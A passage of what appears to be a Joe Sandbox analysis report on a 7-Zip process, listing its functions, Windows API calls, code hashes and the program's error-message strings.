                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: FileTime
                              • String ID:
                              • API String ID: 1425588814-0
                              • Opcode ID: 4a3de73dfb10b1671eec32927cac63c902511c3d15486891ba1e2983bc9e8865
                              • Instruction ID: 98a05e258160385a0655a0f7c3eef2124ceb520d21ac3d9732fbf6a356d239be
                              • Opcode Fuzzy Hash: 4a3de73dfb10b1671eec32927cac63c902511c3d15486891ba1e2983bc9e8865
                              • Instruction Fuzzy Hash: 98014E66B082C047E711DB35A90079EFB91B788BE8F14C122EE4C87B55D77CC445CB01
                              Function 00F799CC Relevance: 1.5, APIs: 1, Instructions: 25fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00F796F8: SetFilePointer.KERNELBASE(00000003,00000000,00000000,?,00F79BD5), ref: 00F79736
                                • Part of subcall function 00F796F8: GetLastError.KERNEL32 ref: 00F79743
                                • Part of subcall function 00F796F8: SetLastError.KERNEL32 ref: 00F7975C
                              • SetEndOfFile.KERNELBASE ref: 00F799FB
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ErrorFileLast$Pointer
                              • String ID:
                              • API String ID: 1697706070-0
                              • Opcode ID: 7bc861c7b5eb5761a791ea73e4469635d3466af59617cd57f8b57b75ddb733e8
                              • Instruction ID: 949d4ebd0e5b6edd90419a6289260802540c5ae526ee5fb0aaaef0da710d5cf3
                              • Opcode Fuzzy Hash: 7bc861c7b5eb5761a791ea73e4469635d3466af59617cd57f8b57b75ddb733e8
                              • Instruction Fuzzy Hash: 44E026137044E493F7208BAA6881BA9C322AB447E0F94C132AF4D439049EE98CCAA700
                              Function 00F76BF0 Relevance: 1.5, APIs: 1, Instructions: 22libraryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00F76B80: FreeLibrary.KERNELBASE(?,?,?,00F76C03), ref: 00F76B91
                              • LoadLibraryExW.KERNELBASE ref: 00F76C10
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: Library$FreeLoad
                              • String ID:
                              • API String ID: 534179979-0
                              • Opcode ID: ec535dba14579e588a217dbf5588d92892c876ee5900133f57a0fc40d7a99ceb
                              • Instruction ID: 8ad8a3b7454b5722e1cd039e93248e31835b99a701a4bc7a7eead7f8c1095f5b
                              • Opcode Fuzzy Hash: ec535dba14579e588a217dbf5588d92892c876ee5900133f57a0fc40d7a99ceb
                              • Instruction Fuzzy Hash: BED02E12701A1192EB252BA2399236823069B06BE2E08C032CF8D83B00DE280CFBB310
                              Function 00F798B8 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: FileWrite
                              • String ID:
                              • API String ID: 3934441357-0
                              • Opcode ID: 2fb2f0fefd54e514cf6a40f39018a395235dd717ad2226923adce02d3f6e3b0a
                              • Instruction ID: fb4a85bb3e25c3e954d658eb851ee25ba6ff9e53a4622f4e9aec37aeeab88ff4
                              • Opcode Fuzzy Hash: 2fb2f0fefd54e514cf6a40f39018a395235dd717ad2226923adce02d3f6e3b0a
                              • Instruction Fuzzy Hash: 03E08C76314640CBE7508F60E400B5AB3A0F388B14F004025DE8E83B44DBBCC144CF40
                              Function 00F782EC Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: CloseFind
                              • String ID:
                              • API String ID: 1863332320-0
                              • Opcode ID: 83abdbc612d9fe913b19c0aa44b7f33faef9c6a21742b24dbd4aaeadee3cbc7c
                              • Instruction ID: 0d0ba32ca3e3aa96a5b36260c734abcc66f602539b4ffaa4403a19e65ab69a54
                              • Opcode Fuzzy Hash: 83abdbc612d9fe913b19c0aa44b7f33faef9c6a21742b24dbd4aaeadee3cbc7c
                              • Instruction Fuzzy Hash: A3D0A772E0190581DF311F7E984432C2352A754F74F188311CD744A2D0EF2488879301
                              Function 00F797B8 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: FileRead
                              • String ID:
                              • API String ID: 2738559852-0
                              • Opcode ID: 1a8169abdd710320b32848016f575c4d8c650cd2f5e1767a783909a1319054dd
                              • Instruction ID: 8d6920956edb119c49a069080fb3797eed14e7d77458dda359ff1ac18e78e973
                              • Opcode Fuzzy Hash: 1a8169abdd710320b32848016f575c4d8c650cd2f5e1767a783909a1319054dd
                              • Instruction Fuzzy Hash: 93D0177A614684CAE7008F60E04575AF764F388B68F080005EA9806764CBBCC199CB00
                              Function 00F76B80 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                              Download Yara Rule
                              APIs
                              • FreeLibrary.KERNELBASE(?,?,?,00F76C03), ref: 00F76B91
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: FreeLibrary
                              • String ID:
                              • API String ID: 3664257935-0
                              • Opcode ID: 01109f61893c3e25e66fa0dd82789664d5e42eb5731ee3caf0e7fb23f98e379a
                              • Instruction ID: 569e920c1d0dd4033df495a391d492706d8b676f1108d34ba03fa5c9dc6abc10
                              • Opcode Fuzzy Hash: 01109f61893c3e25e66fa0dd82789664d5e42eb5731ee3caf0e7fb23f98e379a
                              • Instruction Fuzzy Hash: F6D012A2B12A0481FF254FA6A850B3523549F99F54F1C5015CD1DCA240EF298895E711
                              Function 00F7263C Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs
                              • String ID:
                              • API String ID: 1795875747-0
                              • Opcode ID: f25a7451e5a52859bd194d4f45b432362e3ceccafce0c0a7c876b32af1063925
                              • Instruction ID: c64b66d51faba55136fe7af73aa8c72282ed6f29123beab069afbf45446cc71f
                              • Opcode Fuzzy Hash: f25a7451e5a52859bd194d4f45b432362e3ceccafce0c0a7c876b32af1063925
                              • Instruction Fuzzy Hash: 6AD0C79571074982DE10971AE4453696321F798FD4F4481229D5D47714ED2CD5599B01
                              Function 00F79878 Relevance: 1.5, APIs: 1, Instructions: 8timeCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: FileTime
                              • String ID:
                              • API String ID: 1425588814-0
                              • Opcode ID: 5e4364cb886039da5450fc3fd998d3b1d61beb249d97927aa7d82ce99975c606
                              • Instruction ID: fb0e2e8efa5438a4360a933bcc13c9adbcb65a04b3096626370f688dfa7c6daa
                              • Opcode Fuzzy Hash: 5e4364cb886039da5450fc3fd998d3b1d61beb249d97927aa7d82ce99975c606
                              • Instruction Fuzzy Hash: A8B09220B12401C2CB0C6722989A32C13617B88B05FE1842AC50BD5A50CD1C84A96700
                              Function 00F9BF1C Relevance: 1.3, APIs: 1, Instructions: 85COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 9553adbc2b0cf8556eb9aec2fa57ade0ad41d00013f749b76379d9959dd4e0d3
                              • Instruction ID: 70f49c585a8fe6f814aaa69c69ccf52979a5b37880224fa8e088880f8ff4deb6
                              • Opcode Fuzzy Hash: 9553adbc2b0cf8556eb9aec2fa57ade0ad41d00013f749b76379d9959dd4e0d3
                              • Instruction Fuzzy Hash: F121483370425096EF24DE6ABC0065A7250F385BF8F205229FE5A87388DB3DC842EB80
                              Function 00F7EAE0 Relevance: 1.3, APIs: 1, Instructions: 62COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8cc16c8876d987e3de5e17d18832af4d5879e21422368b64978be7a397600a75
                              • Instruction ID: a72bb118b17faf5b59936753717e17d6a19b563465e15d5099cd8bd7bbecbe31
                              • Opcode Fuzzy Hash: 8cc16c8876d987e3de5e17d18832af4d5879e21422368b64978be7a397600a75
                              • Instruction Fuzzy Hash: 30113A62B15654C1DF358B1C9580734AB91BFDC7E9F24C097EE4F8A610D729C855F203
                              Function 00FB2BB0 Relevance: 1.3, APIs: 1, Instructions: 41COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00F9CA94: free.MSVCRT ref: 00F9CAB1
                                • Part of subcall function 00F9CA94: free.MSVCRT ref: 00F9CABD
                                • Part of subcall function 00F9CA94: free.MSVCRT ref: 00F9CAC9
                                • Part of subcall function 00F9CA94: free.MSVCRT ref: 00F9CAD5
                                • Part of subcall function 00F9CA94: free.MSVCRT ref: 00F9CADE
                                • Part of subcall function 00F9CA94: free.MSVCRT ref: 00F9CAE7
                                • Part of subcall function 00F9CA94: free.MSVCRT ref: 00F9CAF0
                              • free.MSVCRT ref: 00FB2C15
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: d59108536d439d66a8f989801e68f7ac1a10c55ddb19c153846ac4e653761e0c
                              • Instruction ID: 60aa7541c2d6447f270b2194b37a195b166afa6c5c0122f02f01fac2bf9bc19e
                              • Opcode Fuzzy Hash: d59108536d439d66a8f989801e68f7ac1a10c55ddb19c153846ac4e653761e0c
                              • Instruction Fuzzy Hash: D0014C73A10794CACB219F1DC1811ADBB24F758FE83289116DB0907760EB36C883C7A1
                              Function 00F7921C Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 3060b14f209173f6a28d50149139effb67babbacf6fb131f3e42512a25668859
                              • Instruction ID: 281b895c2957f130e776a4d7d5937005a6e1e1d49159d2bdd7ca8eaf78a9b353
                              • Opcode Fuzzy Hash: 3060b14f209173f6a28d50149139effb67babbacf6fb131f3e42512a25668859
                              • Instruction Fuzzy Hash: 1A018F7B3522408AE710CF24D56C35E3BB0A3D2BB8F540209DBA81B3D1C7BAC50ACB91
                              Function 00F7EF28 Relevance: 1.3, APIs: 1, Instructions: 32COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ErrorLast
                              • String ID:
                              • API String ID: 1452528299-0
                              • Opcode ID: 22fbc2d5e8199965c03e49c0b63e129300cee38c0b71475972f44996e2a71a3b
                              • Instruction ID: 88e42ffa8395bb2825f2630b631934133053781531bc5e0bbc30b2d7c524a91f
                              • Opcode Fuzzy Hash: 22fbc2d5e8199965c03e49c0b63e129300cee38c0b71475972f44996e2a71a3b
                              • Instruction Fuzzy Hash: 5CF0EC6274004547DB009F7D98C03A82172B71C795F909437FF8F87A11D538CCA9E716
                              Function 00F792D4 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: e16f68061b023a25359a80f0361e89c5542a2000306fd966a0e35091ec32aca1
                              • Instruction ID: f9701ccd83049c6b2bd2e693e9f2bd6087787a2bdc27470beb5eeb6b8bfb056b
                              • Opcode Fuzzy Hash: e16f68061b023a25359a80f0361e89c5542a2000306fd966a0e35091ec32aca1
                              • Instruction Fuzzy Hash: 50F037729292808E87A0DF28E44014ABBB0E2DA7A0B145226B7EDC7A99E63CC540CF10
                              Function 00F7EEE4 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00F7960C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,00000000,?,?,00000000,?,00000003,00000003), ref: 00F7961E
                              • GetLastError.KERNEL32 ref: 00F7EEF9
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: CloseErrorHandleLast
                              • String ID:
                              • API String ID: 918212764-0
                              • Opcode ID: 00fa4f0c7f1adc1a366ac466b20b99f97a8cee801e5bb11324bbd4013cf968dc
                              • Instruction ID: ef22ed2938b0141942d55dc32ce125d231e491bca8f41dcfe2623e9d76d5b9ba
                              • Opcode Fuzzy Hash: 00fa4f0c7f1adc1a366ac466b20b99f97a8cee801e5bb11324bbd4013cf968dc
                              • Instruction Fuzzy Hash: C2D05E81B601454BEF216ABD2CD43B401827B1C351F90947BFD9FC6612E96CCCCAB627
                              Function 00F7960C Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                              Download Yara Rule
                              APIs
                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,00000000,?,?,00000000,?,00000003,00000003), ref: 00F7961E
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: CloseHandle
                              • String ID:
                              • API String ID: 2962429428-0
                              • Opcode ID: 0d6a5ec00fd9bb15d2acceb7396023bc6caf58f05aff0577609e7a7fb7900fb0
                              • Instruction ID: 8153ca765f467721b7515fb4a980304a36a1909ad347cc121071c90c8da09693
                              • Opcode Fuzzy Hash: 0d6a5ec00fd9bb15d2acceb7396023bc6caf58f05aff0577609e7a7fb7900fb0
                              • Instruction Fuzzy Hash: E0D0C9B2E0194581DB316FBA98413282362AB54B74F689326CA784A6D0DF2985A6A712
                              Function 00F7F3A0 Relevance: 1.3, APIs: 1, Instructions: 13COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 3e155f00f62f0e47eb70742027f4ab7a19f307af7c84af4b08fedca37786f67f
                              • Instruction ID: 2afd145cdc1f12de6c7ae23a6845c1f81edb94c593a751ac965ef270415c7796
                              • Opcode Fuzzy Hash: 3e155f00f62f0e47eb70742027f4ab7a19f307af7c84af4b08fedca37786f67f
                              • Instruction Fuzzy Hash: 2FC012A1A5024583CEB4B7BA58410142261871D7347285762A92C492D2D51D89E7DA12
                              Function 00FC7E40 Relevance: 1.3, APIs: 1, Instructions: 13COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00FC7CC0: free.MSVCRT ref: 00FC7CE5
                                • Part of subcall function 00FC7CC0: free.MSVCRT ref: 00FC7CEE
                                • Part of subcall function 00FC7CC0: free.MSVCRT ref: 00FC7D21
                                • Part of subcall function 00FC7CC0: free.MSVCRT ref: 00FC7D2E
                                • Part of subcall function 00FC7CC0: free.MSVCRT ref: 00FC7D5A
                                • Part of subcall function 00FC7CC0: free.MSVCRT ref: 00FC7D62
                                • Part of subcall function 00FC7CC0: free.MSVCRT ref: 00FC7D6A
                                • Part of subcall function 00FC7CC0: free.MSVCRT ref: 00FC7D77
                                • Part of subcall function 00FC7CC0: free.MSVCRT ref: 00FC7D80
                              • free.MSVCRT ref: 00FC7E5A
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: e32e438a77474687ca9c586bf6d33288871a840c7a8afb180b9d7493ede7d58d
                              • Instruction ID: 7b279a840376b47ca5d5f9720306061cbc3ee9b6e063c68e6480c4b5035da201
                              • Opcode Fuzzy Hash: e32e438a77474687ca9c586bf6d33288871a840c7a8afb180b9d7493ede7d58d
                              • Instruction Fuzzy Hash: 61C01262A10347438F68B6B95C42555325097187747340A14A9304D392D71DC9D35A50

                              Non-executed Functions

                              Function 00FB87AC Relevance: 608.5, APIs: 323, Strings: 23, Instructions: 2966COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID: .001$7-Zip cannot find MAPISendMail function$7zE$GetFullPathName error$It is not allowed to include archive to itself$MAPISendMail$MAPISendMailW$Mapi32.dll$SFX file is not specified$Scanning error$The file already exists$The file is read-only$There is a folder with the name of archive$There is some data block after the end of the archive$Updating for multivolume archives is not implemented$can't find archive$cannot delete the file$cannot find specified SFX module$cannot load Mapi32.dll$cannot move the file$rsfx$stdout$type of archive is not specified
                              • API String ID: 0-3766773286
                              • Opcode ID: 20a7713ef6b6ea6d55c476e9192f369e3571137d13d581bad3dfa489e5dec892
                              • Instruction ID: 594eaeab982169c39d17396bc09607abef6407e4f17d575d4eef882ffbbc7512
                              • Opcode Fuzzy Hash: 20a7713ef6b6ea6d55c476e9192f369e3571137d13d581bad3dfa489e5dec892
                              • Instruction Fuzzy Hash: 89435332649AC591CBB0EB26E8913EEB360F7C5780F808113DA8E57B15DE7DC856EB11
                              Function 00F94640 Relevance: 251.6, APIs: 96, Strings: 46, Instructions: 3062COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
